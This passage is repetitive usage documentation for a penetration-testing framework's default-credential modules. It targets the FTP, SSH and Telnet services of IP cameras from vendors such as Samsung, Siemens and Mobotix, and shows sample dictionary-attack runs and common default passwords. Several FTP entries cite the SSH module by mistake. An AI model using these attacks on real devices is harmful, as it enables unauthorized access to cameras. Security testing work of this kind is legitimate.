Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/iqinvision/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IQInvision Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/iqinvision/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/iqinvision/telnet_default_creds rsf (IQInvision Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IQInvision Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/jvc/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against JVC Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/jvc/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/jvc/ftp_default_creds rsf (JVC Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (JVC Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/jvc/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against JVC Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/jvc/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/jvc/ssh_default_creds rsf (JVC Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (JVC Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/jvc/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against JVC Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/jvc/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/jvc/telnet_default_creds rsf (JVC Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (JVC Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/mobotix/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mobotix Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/mobotix/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/mobotix/ftp_default_creds rsf (Mobotix Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mobotix Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/mobotix/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mobotix Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/mobotix/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/mobotix/ssh_default_creds rsf (Mobotix Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mobotix Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/mobotix/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mobotix Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/mobotix/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/mobotix/telnet_default_creds rsf (Mobotix Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mobotix Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/samsung/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Samsung Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/samsung/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/samsung/ftp_default_creds rsf (Samsung Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Samsung Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/samsung/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Samsung Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/samsung/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/samsung/ssh_default_creds rsf (Samsung Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Samsung Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/samsung/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Samsung Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/samsung/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/samsung/telnet_default_creds rsf (Samsung Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Samsung Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/sentry360/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Sentry360 Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/sentry360/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/sentry360/ftp_default_creds rsf (Sentry360 Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Sentry360 Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/sentry360/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Sentry360 Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/sentry360/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/sentry360/ssh_default_creds rsf (Sentry360 Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Sentry360 Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/sentry360/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Sentry360 Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/sentry360/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/sentry360/telnet_default_creds rsf (Sentry360 Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Sentry360 Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/siemens/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Siemens Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/siemens/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/siemens/ftp_default_creds rsf (Siemens Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Siemens Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/siemens/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Siemens Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/siemens/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/siemens/ssh_default_creds rsf (Siemens Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Siemens Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/siemens/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Siemens Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/siemens/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/siemens/telnet_default_creds rsf (Siemens Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Siemens Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/speco/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Speco Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/speco/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/speco/ftp_default_creds rsf (Speco Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Speco Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/speco/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Speco Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/speco/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/speco/ssh_default_creds rsf (Speco Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Speco Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/speco/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Speco Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/speco/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/speco/telnet_default_creds rsf (Speco Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Speco Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/stardot/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Stardot Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/stardot/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/stardot/ftp_default_creds rsf (Stardot Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Stardot Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/stardot/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Stardot Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/stardot/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/stardot/ssh_default_creds rsf (Stardot Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Stardot Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/stardot/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Stardot Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/stardot/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/stardot/telnet_default_creds rsf (Stardot Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Stardot Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/vacron/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Vacron Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/vacron/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/vacron/ftp_default_creds rsf (Vacron Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Vacron Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/vacron/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Vacron Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/vacron/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/vacron/ssh_default_creds rsf (Vacron Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Vacron Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/vacron/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Vacron Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/vacron/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/vacron/telnet_default_creds rsf (Vacron Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Vacron Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/videoiq/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against VideoIQ Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/videoiq/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/videoiq/ftp_default_creds rsf (VideoIQ Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (VideoIQ Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 